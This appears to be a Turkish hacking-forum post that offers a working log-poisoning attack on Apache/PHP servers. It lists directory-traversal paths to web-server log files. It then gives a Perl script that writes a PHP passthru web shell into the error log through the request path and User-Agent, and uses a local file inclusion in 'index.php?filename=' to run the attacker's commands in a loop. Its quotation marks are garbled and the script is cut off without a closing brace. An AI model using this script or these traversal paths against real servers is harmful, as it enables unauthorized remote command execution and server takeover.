ProLeader ;
Selamun aleyküm // Aleyküm selam..
Kod:
./apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
Code
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site=â[url]www.vulnerablesite.comâ;[/url]
$path=â/â;
$code=â<? Passthru(\$_GET[cmd]) ?>â;
$log = â../../../../../../../etc/httpd/logs/error_logâ;
print âTrying to inject the codeâ;
$socket = IO::Socket::INET->new(Proto=>âtcpâ, PeerAddr=>â$siteâ, PeerPort=>â80â) or die
â\nConnection Failed.\n\nâ;
print $socket âGET â.$path.$code.â HTTP/1.1\r\nâ;
print $socket âUser-Agent: â.$code.â\r\nâ;
print $socket âHost: â.$site.â\r\nâ;
print $socket âConnection: close\r\n\r\nâ;
close($socket);
print â\nCode $code successfully injected in $log \nâ;
print â\nType command to run or exit to end: â;
$cmd = <STDIN>;
while($cmd !~ âexitâ) {
$socket = IO::Socket::INET->new(Proto=>âtcpâ, PeerAddr=>â$siteâ, PeerPort=>â80â) or die
â\nConnection Failed.\n\nâ;
print $socket âGET â.$path.âindex.php?filename=â.$log.â&cmd=$ cmd HTTP/1.1\r\nâ;
print $socket âHost: â.$site.â\r\nâ;
print $socket âAccept: */*\r\nâ;
print $socket âConnection: close\r\n\nâ;
while ($show = <$socket>)
{
print $show;
}
print âType command to run or exit to end: â
//ProLeader